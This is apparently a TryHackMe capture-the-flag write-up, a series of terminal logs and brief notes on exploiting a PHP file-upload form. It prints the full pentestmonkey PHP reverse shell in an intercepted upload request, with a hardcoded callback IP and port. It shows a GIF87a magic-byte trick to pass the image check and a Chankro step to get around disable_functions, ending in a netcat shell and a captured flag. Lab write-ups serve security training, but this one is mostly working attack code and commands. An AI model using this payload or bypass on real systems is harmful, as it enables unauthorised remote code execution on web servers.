┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~]
└─$ Documents/TryHackMe/ && mkdir BypassPHP && BypassPHP
                                                                                                                  
┌──(kali㉿kali)-[~/Documents/TryHackMe/BypassPHP]
└─$ nmap -sC -sV -Pn 10.10.211.107 -oN nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-19 14:19 EST
Nmap scan report for 10.10.211.107
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
|   256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
|_  256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ecorp - Jobs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.64 seconds

┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://10.10.211.107/FUZZ -e .php

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.211.107/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

uploads                 [Status: 301, Size: 316, Words: 20, Lines: 10]
assets                  [Status: 301, Size: 315, Words: 20, Lines: 10]
cv.php                  [Status: 200, Size: 4153, Words: 1078, Lines: 98]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10]
                        [Status: 200, Size: 12012, Words: 3434, Lines: 244]
.php                    [Status: 403, Size: 278, Words: 20, Lines: 10]
phpinfo.php             [Status: 200, Size: 68271, Words: 3211, Lines: 747]
:: Progress: [53168/53168] :: Job [1/1] :: 263 req/sec :: Duration: [0:03:28] :: Errors: 4 ::


> Upload Reverse Shell php script and intercept with BurpSuite

POST /cv.php HTTP/1.1
Host: 10.10.211.107
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------153963865032409206772504812119
Content-Length: 5734
Origin: http://10.10.211.107
Connection: close
Referer: http://10.10.211.107/cv.php
Upgrade-Insecure-Requests: 1

-----------------------------153963865032409206772504812119
Content-Disposition: form-data; name="file"; filename="php-reverse-shell.php"
Content-Type: application/x-php

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.6.121.137';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?> 




-----------------------------153963865032409206772504812119--



> Error: Upload a real image

> gif magic number = GIF87a

> Edit POST request in BurpSuite

POST /cv.php HTTP/1.1
Host: 10.10.211.107
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------251485665140911278251858914226
Content-Length: 5734
Origin: http://10.10.211.107
Connection: close
Referer: http://10.10.211.107/cv.php
Upgrade-Insecure-Requests: 1

-----------------------------251485665140911278251858914226
Content-Disposition: form-data; name="file"; filename="php-reverse-shell.php"
Content-Type: application/x-php

GIF87a
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.

> Response:  OK

┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444 
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.211.107.
Ncat: Connection from 10.10.211.107:44444.
                                                                                                                  
┌──(kali㉿kali)-[~]
└─$ 

> Reverse shell failed to execute



> Document Root: /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db
> disable_functions: exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,



┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~/Documents/TryHackMe/BypassPHP]
└─$ python /opt/Chankro/chankro.py --arch 64 --input shell.sh --output thm.php --path  /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db 


     -=[ Chankro ]=-
    -={ @TheXC3LL }=-


[+] Binary file: shell.sh
[+] Architecture: x64
[+] Final PHP: thm.php


[+] File created!

┌──(kali㉿kali)-[~/Documents/TryHackMe/BypassPHP]
└─$ ls -l 
total 24
-rw-r--r-- 1 kali kali   167 Dec 19 14:34 gobuster
-rw-r--r-- 1 kali kali   895 Dec 19 14:23 nmap
-rw-r--r-- 1 kali kali    43 Dec 19 14:49 shell.sh
-rw-r--r-- 1 kali kali 11834 Dec 19 14:51 thm.php

> Upload file using the gif magic number
> Visit uploads and open file

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444                                                                                           130 ⨯
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.113.123.
Ncat: Connection from 10.10.113.123:41304.
bash: cannot set terminal process group (731): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ find / -type f -name flag.txt 2> /dev/null
<f518e00db/uploads$ find / -type f -name flag.txt 2> /dev/null               
/home/s4vi/flag.txt
www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cat /home/s4vi/flag.txt
<ml/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cat /home/s4vi/flag.txt        
thm{bypass_d1sable_functions_1n_php}
www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ 
